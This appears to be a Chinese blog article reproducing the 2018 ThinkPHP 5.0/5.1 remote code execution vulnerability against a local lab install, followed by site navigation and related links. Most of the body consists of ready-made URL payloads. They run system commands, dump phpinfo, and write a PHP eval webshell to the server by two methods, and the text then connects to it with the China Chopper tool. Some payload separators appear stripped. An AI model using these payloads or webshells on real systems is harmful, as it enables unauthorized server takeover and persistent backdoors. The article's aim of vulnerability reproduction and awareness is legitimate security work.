• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    ThinkPHP 5.x远程命令执行漏洞复现

    一、漏洞描述

    2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:

    https://blog.thinkphp.cn/869075 

    漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。

    二、漏洞影响版本

    Thinkphp 5.x-Thinkphp 5.1.31

    Thinkphp 5.0.x=5.0.23

    三、漏洞复现

    1、官网下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html

    2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public

      

    3、利用system函数远程命令执行

    Payload如下:

    ?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami

      

    4、通过phpinfo函数查看phpinfo()的信息 

    Payload如下:

    ?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=phpinfovars[1][]=1

      

    5、写入shell

    Payload如下:

    ?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=echo ^?php @eval($_POST[cmd]);?^> >shell.php

    注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。

      

    6、查看是否成功写入shell

      

    7、菜刀连接

      

    8、第二种的写入shell的方法

    Payload如下:

    ?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=file_put_contentsvars[1][]=../test.phpvars[1][]=?php @eval($_POST[test]);?>

      

    9、查看是否成功写入文件

      

    10、菜刀连接

      

    总结

    以上所述是小编给大家介绍的ThinkPHP 5.x远程命令执行漏洞复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!
    如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

    您可能感兴趣的文章:
    • ThinkPHP框架任意代码执行漏洞的利用及其修复方法
    • 对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
    • ThinkPHP的标签制作实例讲解
    • thinkphp的钩子的两种配置和两种调用方法
    • phpstudy的安装及ThinkPHP框架的搭建图文讲解
    • ThinkPHP6.0 重写URL去掉Index.php的解决方法
    • ThinkPHP6通过Ucenter实现注册登录的示例代码
    • Thinkphp5+Redis实现商品秒杀代码实例讲解
    • 如何从防护角度看Thinkphp历史漏洞
    上一篇:PHP开启目录引索+fancyindex漂亮目录浏览带搜索功能
    下一篇:php异常处理捕获错误整理
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    ThinkPHP 5.x远程命令执行漏洞复现 ThinkPHP,5.x,远程,命令,执行,